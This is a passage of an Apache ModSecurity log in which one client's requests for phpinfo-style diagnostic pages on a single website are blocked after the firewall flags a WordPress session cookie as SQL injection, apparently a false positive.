"agHo1vy_GXSWIKeli0v1jwAAAIg"]
[Mon May 11 16:33:58.046453 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/test.php"] [unique_id "agHo1vy_GXSWIKeli0v1jwAAAIg"]
[Mon May 11 16:33:58.046673 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/test.php"] [unique_id "agHo1vy_GXSWIKeli0v1jwAAAIg"]
[Mon May 11 16:33:58.204706 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo"] [unique_id "agHo1vy_GXSWIKeli0v1kAAAAIg"]
[Mon May 11 16:33:58.204910 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo"] [unique_id "agHo1vy_GXSWIKeli0v1kAAAAIg"]
[Mon May 11 16:33:58.205144 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo"] [unique_id "agHo1vy_GXSWIKeli0v1kAAAAIg"]
[Mon May 11 16:33:58.362941 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/p.php"] [unique_id "agHo1vy_GXSWIKeli0v1kQAAAIg"]
[Mon May 11 16:33:58.363148 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/p.php"] [unique_id "agHo1vy_GXSWIKeli0v1kQAAAIg"]
[Mon May 11 16:33:58.363418 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/p.php"] [unique_id "agHo1vy_GXSWIKeli0v1kQAAAIg"]
[Mon May 11 16:33:58.528294 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/debug.php"] [unique_id "agHo1vy_GXSWIKeli0v1kgAAAIg"]
[Mon May 11 16:33:58.528499 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/debug.php"] [unique_id "agHo1vy_GXSWIKeli0v1kgAAAIg"]
[Mon May 11 16:33:58.528763 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/debug.php"] [unique_id "agHo1vy_GXSWIKeli0v1kgAAAIg"]
[Mon May 11 16:33:58.686751 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/admin/phpinfo.php"] [unique_id "agHo1vy_GXSWIKeli0v1kwAAAIg"]
[Mon May 11 16:33:58.686967 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/admin/phpinfo.php"] [unique_id "agHo1vy_GXSWIKeli0v1kwAAAIg"]
[Mon May 11 16:33:58.687216 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/admin/phpinfo.php"] [unique_id "agHo1vy_GXSWIKeli0v1kwAAAIg"]
[Mon May 11 16:33:58.845343 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/test/phpinfo.php"] [unique_id "agHo1vy_GXSWIKeli0v1lQAAAIg"]
[Mon May 11 16:33:58.845541 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/test/phpinfo.php"] [unique_id "agHo1vy_GXSWIKeli0v1lQAAAIg"]
[Mon May 11 16:33:58.845767 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/test/phpinfo.php"] [unique_id "agHo1vy_GXSWIKeli0v1lQAAAIg"]
[Mon May 11 16:33:59.004582 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/dev/phpinfo.php"] [unique_id "agHo1_y_GXSWIKeli0v1lgAAAIg"]
[Mon May 11 16:33:59.004785 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/dev/phpinfo.php"] [unique_id "agHo1_y_GXSWIKeli0v1lgAAAIg"]
[Mon May 11 16:33:59.005020 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/dev/phpinfo.php"] [unique_id "agHo1_y_GXSWIKeli0v1lgAAAIg"]
[Mon May 11 16:33:59.163631 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/old/phpinfo.php"] [unique_id "agHo1_y_GXSWIKeli0v1lwAAAIg"]
[Mon May 11 16:33:59.163826 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/old/phpinfo.php"] [unique_id "agHo1_y_GXSWIKeli0v1lwAAAIg"]
[Mon May 11 16:33:59.164074 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/old/phpinfo.php"] [unique_id "agHo1_y_GXSWIKeli0v1lwAAAIg"]
[Mon May 11 16:33:59.322184 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/tmp/phpinfo.php"] [unique_id "agHo1_y_GXSWIKeli0v1mQAAAIg"]
[Mon May 11 16:33:59.322396 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/tmp/phpinfo.php"] [unique_id "agHo1_y_GXSWIKeli0v1mQAAAIg"]
[Mon May 11 16:33:59.322679 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/tmp/phpinfo.php"] [unique_id "agHo1_y_GXSWIKeli0v1mQAAAIg"]
[Mon May 11 16:33:59.482329 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/public/phpinfo.php"] [unique_id "agHo1_y_GXSWIKeli0v1mgAAAIg"]
[Mon May 11 16:33:59.482538 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/public/phpinfo.php"] [unique_id "agHo1_y_GXSWIKeli0v1mgAAAIg"]
[Mon May 11 16:33:59.482792 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/public/phpinfo.php"] [unique_id "agHo1_y_GXSWIKeli0v1mgAAAIg"]
[Mon May 11 16:33:59.640627 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/info"] [unique_id "agHo1_y_GXSWIKeli0v1mwAAAIg"]
[Mon May 11 16:33:59.640840 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/info"] [unique_id "agHo1_y_GXSWIKeli0v1mwAAAIg"]
[Mon May 11 16:33:59.641081 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/info"] [unique_id "agHo1_y_GXSWIKeli0v1mwAAAIg"]
[Mon May 11 16:33:59.799178 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/php-info.php"] [unique_id "agHo1_y_GXSWIKeli0v1nQAAAIg"]
[Mon May 11 16:33:59.799375 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/php-info.php"] [unique_id "agHo1_y_GXSWIKeli0v1nQAAAIg"]
[Mon May 11 16:33:59.799628 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/php-info.php"] [unique_id "agHo1_y_GXSWIKeli0v1nQAAAIg"]
[Mon May 11 16:33:59.958426 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/phpversion.php"] [unique_id "agHo1_y_GXSWIKeli0v1nwAAAIg"]
[Mon May 11 16:33:59.958625 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/phpversion.php"] [unique_id "agHo1_y_GXSWIKeli0v1nwAAAIg"]
